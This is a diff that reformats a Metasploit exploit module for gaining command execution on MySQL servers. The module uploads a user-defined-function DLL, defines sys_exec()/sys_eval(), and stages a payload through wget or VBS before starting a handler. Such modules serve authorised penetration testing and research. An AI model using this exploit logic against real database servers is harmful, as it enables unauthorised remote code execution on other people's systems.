@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => 'Oracle MySQL UDF Payload Execution',
-        'Description'    => %q{
+        'Name' => 'Oracle MySQL UDF Payload Execution',
+        'Description' => %q{
           This module creates and enables a custom UDF (user defined function) on the
           target host via the SELECT ... into DUMPFILE method of binary injection. On
           default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
@@ -25,32 +25,36 @@ class MetasploitModule < Msf::Exploit::Remote
           attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
           and sys_exec() functions.
         },
-        'Author'         =>
-          [
-            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
-            'todb', # this Metasploit module
-            'h00die' # linux addition
-          ],
-        'License'        => MSF_LICENSE,
-        'References'     =>
-          [
-            # Bernardo's work with cmd exec via udf
-            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
-          ],
-        'Platform'       => ['win', 'linux'],
-        'Targets'        =>
-          [
-            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
-            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
-          ],
-        'DefaultTarget'  => 0,
-        'DisclosureDate' => '2009-01-16' # Date of Bernardo's blog post.
-    ))
+        'Author' => [
+          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
+          'todb', # this Metasploit module
+          'h00die' # linux addition
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          # Bernardo's work with cmd exec via udf
+          [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
+        ],
+        'Platform' => ['win', 'linux'],
+        'Targets' => [
+          [ 'Windows', { 'CmdStagerFlavor' => 'vbs' } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+          [ 'Linux', { 'CmdStagerFlavor' => 'wget' } ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-01-16',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        } # Date of Bernardo's blog post.
+      )
+    )
     register_options(
       [
         OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
         OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
-    ])
+      ]
+    )
   end
 
   def post_auth?
@@ -72,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       self.mysql_conn = session.client
     else
       # otherwise fallback to attempting to login
-      m = mysql_login(username,password,'mysql')
+      m = mysql_login(username, password, 'mysql')
       return unless m
     end
 
@@ -97,18 +101,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if not m
       return
-    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
+    elsif not [:win32, :win64, :linux64, :linux32].include?(@mysql_arch)
       print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
       return
     else
       if @mysql_sys_exec_available
-        execute_cmdstager({:linemax => 1500, :nodelete => true})
+        execute_cmdstager({ :linemax => 1500, :nodelete => true })
         handler
       else
         print_status("MySQL function sys_exec() not available")
         return
       end
     end
+
     disconnect
   end
 end
